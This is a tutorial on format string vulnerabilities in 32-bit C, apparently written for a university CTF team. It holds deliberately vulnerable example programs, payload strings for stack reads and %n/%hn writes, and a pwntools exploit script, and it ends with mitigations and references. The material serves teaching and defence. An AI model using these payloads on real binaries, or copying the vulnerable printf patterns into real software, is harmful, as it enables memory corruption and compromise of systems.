Format String Bug Introduction
Summary
This document gives an introduction to format string bugs. A Format String Bug occurs when the programmer passes a user-controlled buffer to a Format Function as the Format String. The Format Function then interprets the Format Parameters contained in the user input as instructions. An exploit can read from the stack and perform arbitrary writes on the stack, and thereby change the program's behavior. This can lead to program crashes (segmentation faults) and to security compromises such as the disclosure of secrets held in memory (information disclosure) or the execution of arbitrary commands.
Requirements
Binaries are tested on platform: Debian 4.9.210-1 (2020-01-20)
git clone https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ccst
cd ccst/format_string
All code examples discussed here can be found in the example folder. They are compiled for the 32-bit x86 architecture using gcc version 6.3.0 (posix).
gcc example.c -m32 -o example
Exploits for the x64 architecture may differ.
Description of Format String Vulnerability
A Format Function is an ANSI C conversion function, such as `printf`, which converts variables into a human-readable string representation. The Format String is the argument of the Format Function that contains ASCII text and Format Parameters, such as:
printf("Guess solution: %d\n", 42);
Here 42 is interpreted as a decimal number by the Format Function.
The Format Parameter/Specifier (%d, %s, %p, %u, ...) defines the type of conversion that is applied to the corresponding argument.
Format Parameter/Specifier Table
Parameters | Output | Passed as |
---|---|---|
%p | External representation of a pointer to void | Reference |
%d | Decimal | Value |
%c | Character | Value |
%u | Unsigned decimal | Value |
%x | Hexadecimal | Value |
%s | String | Reference |
%n | Writes the number of characters printed so far to the integer the argument points to | Reference |
In vulnerable code the user input is passed directly as the Format String, printf(userinput), instead of being passed as an argument to a fixed Format String that contains a Format Parameter, printf("%s", userinput).
Vulnerable Format Functions Table
Format function | Description |
---|---|
fprintf | Writes formatted output to a file |
printf | Output a formatted string |
sprintf | Prints into a string |
snprintf | Prints into a string checking the length |
vfprintf | Prints a va_list argument list to a file |
vprintf | Prints a va_list argument list to stdout |
vsprintf | Prints a va_list argument list into a string |
vsnprintf | Prints a va_list argument list into a string, checking the length |
History
The Format String Bug has been publicly known since at least September 1999 [1]. It gained major attention after the public release of exploit code against wu-ftpd 2.6.0 in June 2000 [2].
Read From the Stack
Example - Read from the stack
The following program shows safe and vulnerable usage of a Format Function:
#include <stdio.h>

int main(int argc, char **argv)
{
    if (argc < 2)
        return 1;
    // This line is safe
    printf("%s\n", argv[1]);
    // This line is vulnerable
    printf(argv[1]);
    return 0;
}
Execute with different arguments:
./example "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
./example "%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
./example "%s"
In the first call, the Format Function interprets the command line argument as a Format String with 15 pointer conversions. Since no matching arguments were passed, it prints the next 15 values it finds on the stack, which means we are able to dump the stack.
What happens exactly?
- Stack with correctly coded Format String
printf(“this is a %s, with a number %d, and address %08x”,a,b,&c);
The stack grows to the lower addresses and is used in a LIFO manner, the arguments are pushed in reverse order on the stack. The Format Function will pop a, b, c variables and convert them into the string which is sent to stdout.(Source of image: [3])
- Stack with missing variables
printf(userinput)
with the input string "this is a %s, with a number %d, and address %08x"
evaluates to
printf("this is a %s, with a number %d, and address %08x");
The arguments a, b and &c are missing on the stack. (Image source: [3])
The Format Function nevertheless reads the next values from the stack, even though they were never passed as arguments.
If the source code is available, a Format String vulnerability can be recognized by checking, for every Format Function call, whether a fixed Format String with the required Format Specifiers is provided. If only a binary is available, test it by simply supplying Format Specifiers such as "%x %x %s" as input.
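When reviewing inputs or log lines, it can help to count how many arguments a string would make a Format Function fetch. The following is a minimal sketch, not a complete printf parser: the regular expression and the helper name `count_consumed_args` are assumptions made for illustration, and `*` widths (which fetch an extra argument) are not counted separately.

```python
import re

# Simplified pattern for one printf conversion specification:
# %[position$][flags][width][.precision][length]conversion
_SPEC = re.compile(
    r"%(?:\d+\$)?[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*)?)?"
    r"(?:hh|h|ll|l|j|z|t|L)?([diouxXeEfFgGaAcspn%])"
)


def count_consumed_args(fmt):
    """Count conversions that would fetch an argument ("%%" fetches none)."""
    return sum(1 for m in _SPEC.finditer(fmt) if m.group(1) != "%")


for probe in ["hello", "100%% sure", "%x %x %s", "AAAA.%6$08x"]:
    print(repr(probe), "->", count_consumed_args(probe))
```

Any user-supplied string for which this count is greater than zero would cause reads beyond the passed arguments if it reached printf as the Format String.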
Read by Direct Stack Parameter Access
File example2.c
#include <stdio.h>
#include <string.h>

void vuln()
{
    printf("What's your name? ");
    char name[200];
    gets(name);                      // unbounded read, part of the vulnerable example
    printf("Nice to meet you, ");
    printf(strcat(name, "!\n"));     // vulnerable: user input is used as the Format String
}

int main(int argc, char **argv)
{
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    vuln();
    return 0;
}
We can read an arbitrary argument from the stack with "%<some number>$x": to read the first argument on the stack we use %1$08x, for the second %2$08x, and so on.
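The two probing styles can be generated with small helpers. This is only a sketch; the function names `sequential_probe` and `direct_probe` and the default marker are illustrative assumptions.

```python
def sequential_probe(count, marker="AAAA"):
    """Marker followed by `count` sequential %08x conversions."""
    return marker + ".%08x" * count


def direct_probe(index, marker="AAAA"):
    """Marker followed by one conversion that reads stack argument `index`."""
    return "{}.%{}$08x".format(marker, index)


print(sequential_probe(3))   # AAAA.%08x.%08x.%08x
print(direct_probe(2))       # AAAA.%2$08x
```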
To get an idea of where we are reading, we can insert a marker followed by a series of Format Parameters:
"AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
./example2
What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
Nice to meet you, AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!
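We can then determine the position of the input buffer on the stack by looking for 41414141, the hexadecimal encoding of AAAA. In the output above it is the 7th value, so the start of the input buffer name can be accessed directly with AAAA.%7$08x. The position depends on how the binary was built and must be determined for each target.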
Caution: data on the stack is stored in little-endian byte order on x86 machines. Test this by inserting
ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
./example2
What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!
In this output the Format String with our input ABCD... is found on the stack starting at the 6th argument, 44434241 in little-endian byte order, which can be verified with ABCD.%6$08x.
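Locating the marker in such a dump can be automated. The sketch below parses the output shown above for the ABCD input and reports the position of the marker; the helper name `find_marker_offset` is hypothetical, and the parsing assumes the dot-separated %08x layout used in this section.

```python
import struct


def find_marker_offset(output, marker):
    """Return the 1-based index of the dumped word that equals `marker`.

    `output` is the text printed by the target, `marker` the 4-byte prefix
    that was sent. Returns None if the marker does not show up.
    """
    # The four marker bytes are loaded as one little-endian 32-bit word.
    wanted = "%08x" % struct.unpack("<I", marker)[0]
    words = output.strip().rstrip("!").split(".")[1:]  # drop the echoed marker
    for index, word in enumerate(words, start=1):
        if word == wanted:
            return index
    return None


dump = ("ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241."
        "30252e78.2e783830.3830252e.252e7838.78383025.30252e78."
        "2e783830.3830252e.252e7838!")
print(find_marker_offset(dump, b"ABCD"))  # 6
```

The byte order reversal is visible in `wanted`: the bytes A, B, C, D (0x41 to 0x44) are searched for as 44434241.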
Arbitrary Read
We would like to read data in memory at a known address. The previous examples showed that the content of the Format String on the stack is controlled by us.
We therefore need a Format Parameter that takes an address from the stack (passed by reference) and displays the memory at that address: %s.
Now we insert the address we would like to read at the start of the input and make sure that the 6th item on the stack, which holds this address, is read with %s, so that the memory it points to is printed as a string.
address = 0x08480110
address (encoded as 32-bit little-endian string): "\x10\x01\x48\x08"
printf("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
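The same payload can be assembled programmatically. This is a minimal sketch using only the standard library; `build_read_payload` is a hypothetical helper, and it assumes that the input buffer starts at the given stack position and that the address contains no zero byte (which would cut the string short).

```python
import struct


def build_read_payload(address, offset):
    """Address bytes first, then padding conversions, then %s at `offset`.

    `offset` is the 1-based stack position at which the start of the
    input buffer shows up (6 in the text above).
    """
    payload = struct.pack("<I", address)          # 32-bit little-endian address
    payload += b"_" + b".".join([b"%08x"] * (offset - 1))
    payload += b"|%s|"                            # dereferences argument `offset`
    return payload


print(build_read_payload(0x08480110, 6))
```

The five %08x conversions consume the first five stack arguments, so the %s that follows is applied to the sixth one, which holds the address bytes.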
(With this information you should be able to solve CH0_easyprintf)
Write to the Stack
Write with %n
The %n Format Parameter writes the number of bytes already printed into a variable. The address of the variable is passed to the Format Function by placing an integer pointer as an argument on the stack.
File: example3
int n_chars = 0;
printf("Hello, World%n is ", &n_chars);
printf("%d bytes long.\n", n_chars);
In the first printf call of example3, the %n Format Parameter writes 12, the number of bytes in Hello, World, into the variable `n_chars`.
%n can be used to write to a specified address:
"\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"
The next printf calls show how the value of n_chars can be controlled by padding the output to a chosen number of bytes.
n_chars = 0;
printf("%10u%n ", 1, &n_chars);    // n_chars=10
n_chars = 0;
printf("%150u%n ", 2, &n_chars);   // n_chars=150
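The effect of the field width on the character count can be checked without a C compiler. Python's % operator has no %n, so in this sketch len() stands in for the value that %n would store; `printed_length` is a hypothetical helper.

```python
def printed_length(fmt, value):
    """Number of characters a single conversion produces for `value`."""
    return len(fmt % value)


print(printed_length("%10u", 1))       # 10
print(printed_length("%150u", 2))      # 150
# The width is only a minimum: longer values are not truncated.
print(printed_length("%2u", 12345))    # 5
```

The last line shows a detail that matters when computing paddings: a width smaller than the natural length of the printed value does not shorten the output.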
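However, addresses in memory are 4 bytes long, and a %n write always stores a full 4-byte integer, so it also changes the bytes next to the one we want to set, which we would like to avoid on the stack. The common technique is therefore to write a single byte at a time and to repeat this several times.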
Let us have a closer look at what is happening, because writing just one byte may have side effects. An unsigned integer is stored in memory as 4 bytes in little-endian encoding, so a number like 0x0000014c is \x4c\x01\x00\x00 in memory.
File: example4
unsigned char canary[5];
unsigned char foo[4];

memset(foo, '\x00', sizeof(foo));
/* 0 * before */ strcpy(canary, "AAAA");
/* 1 */ printf("%16u%n", 7350, (int *) &foo[0]);    // foo[0]=0x10
/* 2 */ printf("%32u%n", 7350, (int *) &foo[1]);    // foo[1]=0x20
/* 3 */ printf("%64u%n", 7350, (int *) &foo[2]);    // foo[2]=0x40
/* 4 */ printf("%128u%n", 7350, (int *) &foo[3]);   // foo[3]=0x80
/* 5 * after */ printf("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]);
printf("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);
In step 0 foo is initialized with four \x00 bytes, and the canary AAAA, represented by \x41\x41\x41\x41, is stored in the next variable on the stack. After the four byte-wise write operations foo contains 10204080 as expected, but 3 bytes of the canary have been overwritten: it now holds \x00\x00\x00\x41 = 00000041, because each %n stores a full 4-byte integer and the zero bytes of the later writes spill past the end of foo. The following figure illustrates this behavior of the write operations. (Image source: [4])
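The overlapping writes can be reproduced with a small memory model. This is a sketch under the assumption that canary is placed directly after foo in memory, as in the description above; `write_n` is a hypothetical stand-in for the effect of %n.

```python
import struct


def write_n(memory, offset, count):
    """Model %n: store `count` as a 4-byte little-endian int at `offset`."""
    memory[offset:offset + 4] = struct.pack("<I", count)


# Assumed layout: foo[4] directly followed by canary[5] ("AAAA" plus NUL).
memory = bytearray(b"\x00" * 4 + b"AAAA\x00")

# Steps 1 to 4: one write per byte of foo, each shifted by one byte.
for index, count in enumerate([0x10, 0x20, 0x40, 0x80]):
    write_n(memory, index, count)

foo, canary = bytes(memory[0:4]), bytes(memory[4:8])
print("foo:   ", foo.hex())      # 10204080
print("canary:", canary.hex())   # 00000041
```

Each write deposits its value in the lowest byte and three zero bytes above it; the last three writes reach one, two and three bytes into the canary.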
Multiple byte writes can also be performed in a single call, as long as the written byte values are in ascending order, because the character count only grows within one call. File: example4
strcpy(canary, "AAAA");
printf("%16u%n%16u%n%32u%n%64u%n",
       1, (int *) &foo[0], 1, (int *) &foo[1],
       1, (int *) &foo[2], 1, (int *) &foo[3]);
printf("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]);
printf("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);
Output again foo: 10204080 and canary: 00000041.
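The widths used in the combined call follow from the running character count. The sketch below derives them; `bytewise_widths` is a hypothetical helper. Taking the difference modulo 256 also covers byte values that are not in ascending order, which is a generalization beyond the example above, and the sketch ignores the case where a computed width is smaller than the natural length of the printed value.

```python
def bytewise_widths(target_bytes, already_printed=0):
    """Padding widths so the running count hits each target byte in turn."""
    widths = []
    count = already_printed
    for value in target_bytes:
        # Only the lowest byte of the count lands in the targeted byte.
        pad = (value - count) % 256
        widths.append(pad)
        count += pad
    return widths


print(bytewise_widths([0x10, 0x20, 0x40, 0x80]))  # [16, 16, 32, 64]
```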
Write Short %hn
Instead of writing each byte, we can write short integers using the %hn format specifier. The advantage of %hn is that it stores only 2 bytes, so two writes cover a 4-byte value without destroying data next to the targeted address. Therefore this is the preferred method.
Again we would like to write 10204080 into foo.
First padding value (foo[0..1] as a little-endian short): 0x2010=8208
Second padding value (foo[2..3] minus the characters already printed): 0x8040-0x2010=32832-8208=24624
Source: example5
printf ("%.8208u%hn%.24624u%hn",1, (short int *) &foo[0], 1, (short int *) &foo[2]);
Output: foo: 10204080 canary: 41414141
Writing short values enables an exploitation of the Format String Bug without overwriting nearby memory locations.
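The two padding values can be derived and checked with the following sketch. `short_write_plan` is a hypothetical helper, and the memory model again assumes that the canary directly follows foo.

```python
import struct


def short_write_plan(target_bytes):
    """Split four target bytes into two shorts and derive the %hn paddings."""
    low, high = struct.unpack("<HH", bytes(target_bytes))
    first = low
    second = (high - low) % 0x10000
    return low, high, first, second


low, high, first, second = short_write_plan([0x10, 0x20, 0x40, 0x80])
print(hex(low), hex(high), first, second)  # 0x2010 0x8040 8208 24624

# Model the two 2-byte stores performed by %hn.
memory = bytearray(b"\x00" * 4 + b"AAAA")
memory[0:2] = struct.pack("<H", first & 0xffff)
memory[2:4] = struct.pack("<H", (first + second) & 0xffff)
print(bytes(memory[0:4]).hex(), bytes(memory[4:8]).hex())  # 10204080 41414141
```

Because each store is exactly 2 bytes wide, the second write ends at the last byte of foo and the canary stays intact.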
To overwrite a 4-byte address we need just two write steps; take care to pass the parameters in the correct order.
Write Short Example: Given a binary vuln with a Format String vulnerability, we would like to overwrite a variable test on the stack, located at the known address test_addr=0xffeeecac, and set it to test=0x1337babe. The input buffer used in the printf function is the 6th element on the stack.
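A Python script that builds the exploitation string p32(addr)+p32(addr+2)+'%'+str(first)+'x%6$hn'+'%'+str(second)+'x%7$hn' looks like
from pwn import *

p = process('./vuln')
test_addr = 0xffeeecac
payload = b''
payload += p32(test_addr)        # low half, reached via %6$hn
payload += p32(test_addr + 2)    # high half, reached via %7$hn
# 0xbabe characters must have been printed before the first %hn
first = 0xbabe - len(payload)
payload += ('%' + str(first) + 'x%6$hn').encode()
# 0x1337 is smaller than 0xbabe, so the 16-bit count has to wrap around
second = (0x1337 - 0xbabe) % 0x10000
payload += ('%' + str(second) + 'x%7$hn').encode()
p.sendline(payload)
p.interactive()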
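The padding arithmetic can be checked offline, without pwntools or a running target. The sketch below uses `struct.pack` in place of `p32`; `build_hn_payload` is a hypothetical helper that follows the string layout described above and assumes a 32-bit little-endian target.

```python
import struct


def build_hn_payload(address, value, offset):
    """Two %hn writes that store the 32-bit `value` at `address`.

    `offset` is the stack position of the first payload word
    (6 in the example above).
    """
    payload = struct.pack("<II", address, address + 2)
    printed = len(payload)
    for index, half in enumerate((value & 0xffff, value >> 16)):
        pad = (half - printed) % 0x10000
        if pad < 8:
            # %x may emit up to 8 hex digits, so very small widths are unreliable
            pad += 0x10000
        payload += "%{}x%{}$hn".format(pad, offset + index).encode()
        printed += pad
    return payload


payload = build_hn_payload(0xffeeecac, 0x1337babe, 6)
print(payload[8:])  # b'%47798x%6$hn%22649x%7$hn'
```

After the first conversion 8 + 47798 = 0xbabe characters have been printed; after the second the total is 0x11337, whose lower 16 bits are 0x1337.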
(Now you should be able to solve the challenge CH1_root_me2 and CH2_printfun)
Usage
- Reading arbitrary locations (leak addresses or canaries)
- Writing arbitrary locations
- Executing arbitrary code (overwriting return addresses or .GOT entries)
Protection
- Programmers should use the safe forms of the Format Functions
Never pass user input directly to a Format Function without a format specifier. [5]
printf("%s", userinputbuffer);
snprintf(buf, sizeof buf, "%s", userinputbuffer);
- FormatGuard: Automatic Protection From printf Format String Vulnerabilities [6]
Courses
- Campus Cyber Security Team (05-15-2020)
Sources
- https://owasp.org/www-community/attacks/Format_string_attack
- https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf
- http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20Bugs%20-%20Exploiting%20format%20string.pdf
- http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html
Interesting CTF writeups
- Use format string bug to leak canary and system addresses https://naivenom.tistory.com/19
- https://github.com/yuvaly0/CTFs/blob/master/2020_tamu/B64DECODER_DONE/B64DECODER.md
References
- [1] Tymm Twillman, Exploit for proftpd 1.2.0pre6, BugTraq, 20-09-1999, https://seclists.org/bugtraq/1999/Sep/328 [accessed 05-21-2020].
- [2] tf8, WuFTPD: Providing *remote* root since at least 1994, BugTraq, 22-06-2000, https://seclists.org/bugtraq/2000/Jun/297 [accessed 05-21-2020].
- [3] Saif El Sherei, Format String Exploitation-Tutorial, https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf [accessed 05-21-2020].
- [4] scut / team teso, Exploiting Format String Vulnerabilities, version 1.2, 09-01-2001, http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20Bugs%20-%20Exploiting%20format%20string.pdf [accessed 05-21-2020].
- [5] Michael Howard, David LeBlanc and John Viega, 19 deadly sins of software security programming flaws and how to fix them, Chapter 2, 2005, http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20String%20Problems.pdf [accessed 05-22-2020].
- [6] Crispin Cowan, Matt Barringer, Steve Beattie, Greg Kroah-Hartman, Mike Frantzen and Jamie Lokier, FormatGuard: Automatic Protection From printf Format String Vulnerabilities, Usenix, 2001, https://www.usenix.org/legacy/events/sec01/full_papers/cowanbarringer/cowanbarringer.pdf [accessed 05-21-2020].